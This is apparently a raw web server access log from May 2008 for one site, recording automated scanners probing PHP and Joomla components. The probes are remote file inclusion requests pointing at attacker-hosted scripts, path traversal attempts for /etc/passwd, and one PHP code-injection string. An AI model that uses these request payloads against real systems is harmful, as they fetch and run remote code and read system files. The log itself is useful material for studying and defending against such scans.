72.18.152.168 - - [03/May/2008:11:26:09 -0700] "GET //port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [03/May/2008:11:26:11 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [03/May/2008:11:26:11 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [03/May/2008:11:26:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:26:47 -0700] "GET /logs/access_080225.log/db.php?path_local=http://www.pmstudio.net/linho/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:26:47 -0700] "GET /logs/db.php?path_local=http://www.pmstudio.net/linho/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:26:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:26:55 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.113.203.55 - - [03/May/2008:11:27:23 -0700] "GET /logs/access_071211.log/db.php?path_local=http://www.pmstudio.net/linho/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.74.114 - - [03/May/2008:11:28:04 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:28:50 -0700] "GET /logs/access_080321.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:28:53 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:28:54 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:28:55 -0700] "GET /logs/access.log/details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:28:56 -0700] "GET /details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:28:56 -0700] "GET /logs/details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:10 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:10 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:11 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.7.220 - - [03/May/2008:11:29:16 -0700] "GET /logs/access_080225.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:18 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:46 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:46 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:29:46 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:30:03 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:30:03 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:30:03 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:11:30:38 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:11:30:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.117.208 - - [03/May/2008:11:30:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:30:49 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:31:05 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:31:06 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.64.48.157 - - [03/May/2008:11:31:26 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:11:31:26 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:11:31:26 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:11:31:26 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.213.74.114 - - [03/May/2008:11:31:43 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:11:31:53 -0700] "GET //claroline/tracking/userLog.php?rootSys=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:11:31:53 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [03/May/2008:11:31:53 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [03/May/2008:11:32:17 -0700] "GET //errors.php?error=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.225 - - [03/May/2008:11:32:19 -0700] "GET /bikes/dteel/2008_02_08/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.0.20.12 - - [03/May/2008:11:33:30 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.56.164.70/coppermine/docs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.0.20.12 - - [03/May/2008:11:33:30 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://208.56.164.70/coppermine/docs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:33:32 -0700] "GET /logs/access_080315.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:34:01 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:34:01 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:34:01 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:11:34:33 -0700] "GET /logs/access_071219.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:11:34:34 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:11:34:34 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:34:37 -0700] "GET /logs/index.php?option=com_alphacontent§ion=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:34:40 -0700] "GET /index.php?option=com_alphacontent§ion=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:35:07 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:14 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:14 -0700] "GET //oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.217.209 - - [03/May/2008:11:35:18 -0700] "GET /logs//ashnews.php?pathtoashnews=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.217.209 - - [03/May/2008:11:35:18 -0700] "GET //ashnews.php?pathtoashnews=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:31 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:31 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:37 -0700] "GET /logs/access_080215.log//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:38 -0700] "GET //port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:38 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:38 -0700] "GET /logs//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:35:38 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:38 -0700] "GET /logs/access_080215.log//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:39 -0700] "GET //port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:11:35:39 -0700] "GET /logs//port.php?content=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:35:44 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:35:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:36:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:36:25 -0700] "GET //ashnews.php?pathtoashnews=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:11:36:37 -0700] "GET /logs/access_080115.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:36:38 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:11:36:39 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.28.163 - - [03/May/2008:11:37:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.210.166.234 - - [03/May/2008:11:37:36 -0700] "GET /logs/access_071028.log HTTP/1.1" 200 27183 "http://en.wikipedia.org/wiki/LaSexta" "-" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:38:02 -0700] "GET /logs//main.php?sayfa=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:11:38:02 -0700] "GET //main.php?sayfa=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:38:11 -0700] "GET /display.php?lang=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:39:58 -0700] "GET /logs/access.log/details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:39:59 -0700] "GET /details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:40:00 -0700] "GET /logs/details.php?loc=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:40:41 -0700] "GET /logs/access_080214.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:40:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:40:41 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:40:43 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:40:46 -0700] "GET /logs/access_080214.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:40:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:40:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:40:49 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:40:51 -0700] "GET /logs/access_080214.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:40:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:40:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:40:55 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:11:42:18 -0700] "GET //errors.php?error=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:11:42:18 -0700] "GET /logs//errors.php?error=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.210.166.234 - - [03/May/2008:11:42:53 -0700] "GET /logs/access_071104.log HTTP/1.1" 200 75933 "http://en.wikipedia.org/wiki/LaSexta" "-" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:43:06 -0700] "GET /logs/access_080214.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:43:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:43:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.217.209 - - [03/May/2008:11:43:12 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://admin.devilix.org/~ahmad83/download/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:43:14 -0700] "GET /logs/access_080228.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:11:43:57 -0700] "GET /logs//calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:11:43:57 -0700] "GET //calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:11:44:36 -0700] "GET /logs//calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:11:44:37 -0700] "GET /logs//calendar.php?p=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:11:44:37 -0700] "GET //calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:11:44:37 -0700] "GET //calendar.php?p=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:45:05 -0700] "GET /logs//main.php?sayfa=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:45:05 -0700] "GET //main.php?sayfa=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.211.25 - - [03/May/2008:11:45:24 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.25 - - [03/May/2008:11:45:25 -0700] "GET /retreat1/?N=A HTTP/1.1" 200 15081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:11:45:36 -0700] "GET /logs//port.php?content=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [03/May/2008:11:45:36 -0700] "GET //port.php?content=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.92.9 - - [03/May/2008:11:45:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.86.92.9 - - [03/May/2008:11:45:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.19.51.194 - - [03/May/2008:11:46:13 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [03/May/2008:11:46:13 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [03/May/2008:11:46:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.26.5 - - [03/May/2008:11:46:18 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://163.27.78.150/xoops2/modules/cjaycontent/admin/editor2/lib/lang/en/mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.67.26.5 - - [03/May/2008:11:46:18 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://163.27.78.150/xoops2/modules/cjaycontent/admin/editor2/lib/lang/en/mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
